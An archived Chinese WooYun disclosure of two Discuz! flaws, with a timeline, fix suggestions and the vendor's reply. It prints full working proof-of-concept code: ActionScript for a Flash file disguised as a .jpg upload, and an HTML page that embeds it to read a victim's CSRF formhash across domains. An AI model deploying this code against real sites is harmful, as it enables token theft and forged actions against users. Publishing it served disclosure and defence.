当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-065249

漏洞标题:Discuz跨域数据劫持+附件类型限制绕过

相关厂商:Discuz!

漏洞作者: mramydnei

提交时间:2014-06-17 14:28

修复时间:2014-09-15 14:30

公开时间:2014-09-15 14:30

漏洞类型:文件上传导致任意代码执行

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-17: 细节已通知厂商并且等待厂商处理中
2014-06-17: 厂商已经确认,细节仅向厂商公开
2014-06-20: 细节向第三方安全合作伙伴开放
2014-08-11: 细节向核心白帽子及相关领域专家公开
2014-08-21: 细节向普通白帽子公开
2014-08-31: 细节向实习白帽子公开
2014-09-15: 细节向公众公开

简要描述:

两个凑一块发了

详细说明:

#1 跨域数据劫持(csrf token formhash盗取)
下载远程附件功能不会对文件内容(文件格式)进行检测导致可以上传恶意的swf文件(扩展名还是图片扩展名),进而进行跨域数据劫持:
伪造图片CrossDomainDataHijack.jpg相关代码:

package com.powerflasher.SampleApp {
import flash.external.ExternalInterface;
import flash.display.Sprite;
import flash.display.Sprite;
import flash.events.Event;
import flash.net.URLLoader;
import flash.net.URLRequest;
import flash.text.TextField;
import flash.text.TextFieldAutoSize;
import flash.xml.*;
import flash.events.IOErrorEvent;
import flash.events.*;
import flash.net.*;
/**
* @author User
*/

public class CrossDomainDataHijack extends Sprite {

private var loader:URLLoader;
public function CrossDomainDataHijack() {
loader = new URLLoader();
configureListeners(loader);
var target:String = root.loaderInfo.parameters.input;

var request:URLRequest = new URLRequest(target);
try {
loader.load(request);
} catch (error:Error) {
sendDatatoJS("Unable to load requested document; Error: " + error.getStackTrace());
}
}
private function configureListeners(dispatcher:IEventDispatcher):void {
dispatcher.addEventListener(Event.COMPLETE, completeHandler);
dispatcher.addEventListener(Event.OPEN, openHandler);
dispatcher.addEventListener(ProgressEvent.PROGRESS, progressHandler);
dispatcher.addEventListener(SecurityErrorEvent.SECURITY_ERROR, securityErrorHandler);
dispatcher.addEventListener(HTTPStatusEvent.HTTP_STATUS, httpStatusHandler);
dispatcher.addEventListener(IOErrorEvent.IO_ERROR, ioErrorHandler);
}
private function completeHandler(event:Event):void {
var loader:URLLoader = URLLoader(event.target);
//trace("completeHandler: " + loader.data);
sendDatatoJS("completeHandler: " + loader.data);
}
private function openHandler(event:Event):void {
//trace("openHandler: " + event);
sendDatatoJS("openHandler: " + event);
}
private function progressHandler(event:ProgressEvent):void {
//trace("progressHandler loaded:" + event.bytesLoaded + " total: " + event.bytesTotal);
sendDatatoJS("progressHandler loaded:" + event.bytesLoaded + " total: " + event.bytesTotal);
}
private function securityErrorHandler(event:SecurityErrorEvent):void {
//trace("securityErrorHandler: " + event);
sendDatatoJS("securityErrorHandler: " + event);
}
private function httpStatusHandler(event:HTTPStatusEvent):void {
//trace("httpStatusHandler: " + event);
sendDatatoJS("httpStatusHandler: " + event);
}
private function ioErrorHandler(event:IOErrorEvent):void {
//trace("ioErrorHandler: " + event);
sendDatatoJS("ioErrorHandler: " + event);
}

private function sendDatatoJS(data:String):void{
trace(data);
ExternalInterface.call("sendToJavaScript", data);
}
}


}


POC页面相关代码:

><head>
<title>steal CSRF tokens by upload a fake image(flash) file on target site</title>
</head><body><h1 align="center">steal CSRF tokens by upload a fake image(flash) file on targe site</h1>
<script>
function sendToJavaScript(strData){
var theDiv = document.getElementById("HijackedData");
var content = document.createTextNode(strData);
theDiv.appendChild(content);
theDiv.innerHTML += '<br/>'
//alert(strData);
}
function refreshObjectTag(){
var newURL = document.getElementById('flashFile').value +"?input="+document.getElementById('target').value;

var newObjectTag = createSwfObject(newURL,{id: 'myObject', width: 100, height: 100, 'AllowScriptAccess': 'always'},{'AllowScriptAccess': 'always'})
document.body.removeChild(document.getElementById("myObject"));
document.body.appendChild(newObjectTag);
}
var createSwfObject = function(src, attributes, parameters) {
var i, html, div, obj, attr = attributes || {}, param = parameters || {};
attr.type = 'application/x-shockwave-flash';
if (window.ActiveXObject) {
attr.classid = 'clsid:d27cdb6e-ae6d-11cf-96b8-444553540000';
param.movie = src;
}
else {
attr.data = src;
}
html = '<object';
for (i in attr) {
html += ' ' + i + '="' + attr[i] + '"';
}
html += '>';
for (i in param) {
html += '<param name="' + i + '" value="' + param[i] + '" />';
}
html += '</object>';
div = document.createElement('div');
div.innerHTML = html;
obj = div.firstChild;
div.removeChild(obj);
return obj;
};
</script>
File: <input id="flashFile" size="100" value="http://x55.me/CrossDomainDataHijack.jpg" type="text"> <br>
Page: <input id="target" size="100" value="http://x55.me/csrf.php" type="text"> <br>
<input value="start to steal some CSRF tokens" onclick="refreshObjectTag()" type="button"><br>
<br>
<div id="HijackedData"></div>
<br>
<object id="myObject"></object>
</body></html>


获取formhash截图:

123.png


#2
绕过附件类型限制用到的是上次有讲到的Hacking with Unicode上面的小trick。这个算BUG吧,算不上安全漏洞 起码暂时我还没能把它联系到漏洞上面。可以选择性修复:

123333.png


测试:

12444444.png


成功绕过:

125555555.png


漏洞证明:

证明如上

修复方案:

1.对于加载远程附件功能也加上检测文件格式的流程
2.第二个问题可以选择性修复

版权声明:转载请注明来源 mramydnei@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-06-17 15:11

厂商回复:

感谢您提供的信息。我们会尽快确认并修复。问题2应当不会造成什么安全威胁,虽然绕过了文件名的检测,但是上传的文件在实际存储的时候,我们会使用随机文件名和固定的后缀。dz目前尚未严格要求文件后缀与文件内容必须一致,这个判断过于复杂且必要性不大。

最新状态:

暂无